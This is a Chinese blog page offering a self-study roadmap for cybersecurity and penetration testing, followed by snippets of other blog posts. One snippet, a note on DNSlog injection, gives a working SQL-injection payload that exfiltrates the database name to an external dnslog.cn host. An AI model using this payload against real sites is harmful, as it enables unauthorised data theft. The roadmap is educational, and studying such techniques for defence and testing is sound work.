当前位置：首页 > news >正文

网络安全——黑客自学（笔记）

news 2025/10/14 4:31:14

想自学网络安全（黑客技术）首先你得了解什么是网络安全！什么是黑客！！！

网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。

无论网络、Web、移动、桌面、云等哪个领域，
都有攻与防两面性，例如 Web 安全技术，既有 Web 渗透，
也有 Web 防御技术（WAF）。作为一个合格的网络安全工程师，
应该做到攻守兼备，毕竟知己知彼，才能百战百胜。

一、自学网络安全学习的误区和陷阱

1.不要试图先成为一名程序员（以编程为基础的学习）再开始学习
行为：从编程开始掌握，前端后端、通信协议、什么都学。

缺点：花费时间太长、实际向安全过渡后可用到的关键知识并不多。

很多安全函数知识甚至名词都不了解 unserialize outfile

2.不要把深度学习作为入门第一课

很多人都是冲着要把网络安全学好学扎实来的，于是就很容易用力过猛，陷入一个误区：就是把所有的内容都要进行深度学习，但是把深度学习作为网络安全第一课不是个好主意。原因如下：

【1】深度学习的黑箱性更加明显，很容易学的囫囵吞枣

【2】深度学习对自身要求高，不适合自学，很容易走进死胡同

3.以黑客技能、兴趣为方向的自学误区：

行为：疯狂搜索安全教程、加入各种小圈子，逢资源就下，逢视频就看，只要是黑客相关的。

缺点：就算在考虑资源质量后的情况下，能学习到的知识点也非常分散，重复性极强。

代码看不懂、讲解听不明白，一知半解的情况时而发生。

在花费大量时间明白后，才发现这个视频讲的内容其实和自己看的其他知识点是一样的。

4.不要收集过多的资料

网上有很多关于网络安全的学习资料，动辄就有几个G的材料可以下载或者观看。而很多朋友都有“收集癖”，一下子购买十几本书，或者收藏几十个视频

网上的学习资料很多重复性都极高而且大多数的内容都还是几年前没有更新。在入门期间建议“小而精”的选择材料，下面我会推荐一些自认为对小白还不错的学习资源，耐心往下看

二、学习网络安全的一些前期准备

1.硬件选择

经常会问我“学习网络安全需要配置很高的电脑吗？”答案是否定的，黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!所以，不要打着学习的名义重新购买机器...

2.软件选择

很多人会纠结学习黑客到底是用Linux还是Windows或者是Mac系统，Linux虽然看着很酷炫，但是对于新人入门并不友好。Windows系统一样可以用虚拟机装靶机来进行学习

至于编程语言，首推Python，因为其良好的拓展支持性。当然现在市面上很多网站都是PHP的开发的，所以选择PHP也是可以的。其他语言还包括C++、Java...

很多朋友会问是不是要学习所有的语言呢？答案是否定的！引用我上面的一句话：学习编程只是工具不是目的，我们的目标不是成为程序员

（这里额外提一句，学习编程虽然不能带你入门，但是却能决定你能在网络安全这条路上到底能走多远，所以推荐大家自学一些基础编程的知识）

3.语言能力

我们知道计算机最早是在西方发明出来的，很多名词或者代码都是英文的，甚至现有的一些教程最初也是英文原版翻译过来的，而且一个漏洞被发现到翻译成中文一般需要一个星期的时间，在这个时间差上漏洞可能都修补了。而且如果不理解一些专业名词，在与其他黑客交流技术或者经验时也会有障碍，所以需要一定量的英文和黑客专业名词（不需要特别精通，但是要能看懂基础的）

三、网络安全学习路线

图片过大！上传一直不清晰需要高清PDF版的可以留言告诉我或者厚台踢我！由于陌生人每天私信有限！大家也可以关注我，关注后后台会自动发送分享链接，大家自取就行啦！

第一阶段（打好基础）

网络安全行业与法规
Linux操作系统
计算机网络基础课程
HTML基础课程
PHP零基础课程
MySQL基础课程
图解Python语法

第二阶段（初级渗透）

信息收集
WEB安全
漏洞扫描
APP渗透
渗透工具
漏洞复现
实战挖洞

第三阶段（高级渗透）

渗透框架
权限提升
权限维持
隧道技术
内网渗透
溯源取证
无线安全
DDOs攻防

第四阶段（安全管理）

等级保护
风险评估
应急响应
数据安全
面试就业指导

第五阶段（二进制逆向）

c语言
c++
汇编语言
安卓逆向
Windows逆向
免杀-反杀毒技术

注：前面三个阶段是重点学习的

四、学习资料的推荐

学习框架已经整理完毕，现在就差资料资源了，我这里整理了所有知识点对应的资料资源文档，大家不想一个一个去找的话，可以参考一下这些资料！

点赞收藏评论区留言“已关注求 ”！都可以免费分享给大家！等不及的小伙伴也可以直接厚台踢我！或者关注我之后后台会自动发送给大家！关注后大家注意看后台消息就行！

视频教程+面试题+工具+学习路线+笔记

所有的资料都已经整理好了

结语

网络安全产业就像一个江湖，各色人等聚集。相对于欧美国家基础扎实（懂加密、会防护、能挖洞、擅工程）的众多名门正派，我国的人才更多的属于旁门左道（很多白帽子可能会不服气），因此在未来的人才培养和建设上，需要调整结构，鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”，才能解人才之渴，真正的为社会全面互联网化提供安全保障。

特别声明：

此教程为纯技术分享！本教程的目的决不是为那些怀有不良动机的人提供及技术支持！也不承担因为技术被滥用所产生的连带责任！本教程的目的在于最大限度地唤醒大家对网络安全的重视，并采取相应的安全措施，从而减少由网络安全而带来的经济损失！！！！

网络安全——黑客自学（笔记）

想自学网络安全（黑客技术）首先你得了解什么是网络安全！什么是黑客！！！ 网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队…...

编程日记 2023/10/7 23:36:35

docker hub地址：https://hub.docker.com 拉取镜像 docker pull elasticsearch:7.16.3创建容器 docker run -di --nameelasticsearch -p 9200:9200 -p 9300:9300 -p 5601:5601 -e "discovery.typesingle-node" -e "cluster.nameelasticsearch" -…...

编程日记 2023/10/7 23:35:34

springmvc-controller视图层配置SpringMVC处理请求的流程

目录 1. 什么是springmvc 2.项目中加入springmvc支持 2.1 导入依赖 2.2 springMVC配置文件 2.3 web.xml配置 2.4 中文编码处理 3. 编写一个简单的controller 4. 视图层配置 4.1 视图解析器配 4.2 静态资源配置 4.2 编写页面 4.3 页面跳转方式 5. SpringMVC处理请求…...

编程日记 2023/10/7 23:34:33

三模块七电平级联H桥整流器电压平衡控制策略Simulink仿真

💥💥💞💞欢迎来到本博客❤️❤️💥💥 🏆博主优势：🌞🌞🌞博客内容尽量做到思维缜密，逻辑清晰，为了方便读者。 ⛳️座右铭&a…...

编程日记 2023/10/7 23:33:32

【window10】Dart+Android Studio+Flutter安装及运行

安装Dart SDK安装Android Studio安装Flutter在Android Studio中创建并运行Flutter项目安装前，请配置好你的jdk环境，准备好你的梯子~ 安装Dart SDK 浅浅了解一下Dart： Dart 诞生于2011年，是由谷歌开发的一种强类型、跨平台的客户…...

编程日记 2023/10/7 23:32:31

【C++】运算符重载 ⑩ ( 下标 [] 运算符重载 | 函数原型 int operator[](int i) | 完整代码示例 )

文章目录一、下标 [] 运算符重载1、数组类回顾2、下标 [] 运算符重载二、完整代码示例1、Array.h 数组头文件2、Array.cpp 数组实现类3、Test.cpp 测试类4、执行结果一、下标 [] 运算符重载 1、数组类回顾在之前的博客【C】面向对象示例 - 数组类 ( 示例需求 | 创建封装类…...

编程日记 2023/10/7 23:30:30

ROS机械臂开发-开发环境搭建【一】

目录前言环境配置docker搭建Ubuntu环境安装ROS 基础ROS文件系统 bugs 前言想系统学习ROS，做一些机器人开发。因为有些基础了，这里随便写写记录一下。环境配置 docker搭建Ubuntu环境 Dockerfile # 基础镜像 FROM ubuntu:18.04 # 设置变量 ENV ETC…...

编程日记 2023/10/7 23:29:29

深度思考rpc框架面经之五：rpc限流：rpc事务：tps测试

11 注册中心监控和rpc限流（用友云产品部二面） 11.1 你这个注册中心有实现相关的监控吗 11.1.1 如何实现注册中心有实现相关的监控是的，我可以为你提供关于RPC注册中心及其监控的相关信息。RPC注册中心是用于管理微服务之间调用关系的中心…...

编程日记 2023/10/7 23:28:28

[AIGC] Java序列化利器 gson

前言： 本篇文章主要介绍了Gson库，从是什么、为什么、怎么用三个方面进行了详细的介绍。在是什么部分，介绍了Gson库的作用和特点；在为什么部分，介绍了为什么要使用Gson库；在怎么用部分，介绍了如何…...

编程日记 2023/10/7 23:27:26

VMware 虚拟机删除+重建

由于本人暴力地关闭虚拟机，导致虚拟机出现了一些问题，并且还没有给虚拟机拍快照，虽然还能用，但本人不想将就，于是乎打算重新新建一个虚拟机一、删除 1.打开workstation,选择虚拟机，右键选择移除。虽然虚…...

编程日记 2023/10/7 23:21:21

环面上 FHE 的快速自举：LUT/Automata Blind Rotate

参考文献： [AP14] Alperin-Sheriff J, Peikert C. Faster bootstrapping with polynomial error[C]//Advances in Cryptology–CRYPTO 2014: 34th Annual Cryptology Conference, Santa Barbara, CA, USA, August 17-21, 2014, Proceedings, Part I 34. Springer B…...

编程日记 2023/10/7 23:20:19

VScode配置文件launch.json 和 tasks.json配置项详细说明

tasks.json tasks.json为编译配置文件 {"version": "2.0.0", // tasks.json 文件的版本号"tasks": [ // 任务数组，包含一个编译任务配置对象{"type": "cppbuild", // 任务类型，这里是 cppbuild …...

编程日记 2023/10/7 23:19:18

DNSlog 注入简单笔记

无回显的盲注可以想办法回显到 dns 日志上： 1、打开 http://www.dnslog.cn 获取域名 2、注入： ?id1 and (select load_file(concat(//,(select database()),.3.mw0gxd.dnslog.cn/a)))-- 3、点击刷新得到回显：...

编程日记 2023/10/7 23:18:17

HDLbits: Dualedge

FPGA没有双边缘触发触发器，（posedge clk或negedge clk）会报错 “FPGA（以及其他任何地方）上的触发器是一个具有一个时钟且仅对该时钟的一个边缘敏感的器件。”参考verilog为什么不能双边沿触发实现双边沿的两种方法 …...

编程日记 2023/10/7 23:17:16

网络安全_黑客（自学）

编程日记 2023/10/7 23:16:15

AI 大框架分析基于python之TensorFlow(归一化处理,多类别分类的概率)

AI 大框架分析基于python之TensorFlow(归一化处理,多类别分类的概率) AI（人工智能）的大框架有很多种，以下是一些常见的AI框架： TensorFlow：由谷歌开发的开源机器学习框架，支持各种任务，包括图像…...

编程日记 2023/10/7 23:15:13

C++day01（QT简介、C++）

今日任务： 代码： #include <iostream>using namespace std;int main() {/** 输入字符串统计大写、小写、数字、空格以及其他字符的个数**/string s;cout << "请输入一个字符串" << endl;//cin >> s;getline(cin,s);i…...

编程日记 2023/10/7 23:13:12

Web server failed to start. Port 8080 was already in use

一、问题 package com.djc.boot;import org.springframework.boot.SpringApplication; import org.springframework.boot.autoconfigure.SpringBootApplication; import org.springframework.web.bind.annotation.RequestMapping; import org.springframework.web.bind.annota…...

编程日记 2023/10/7 23:11:10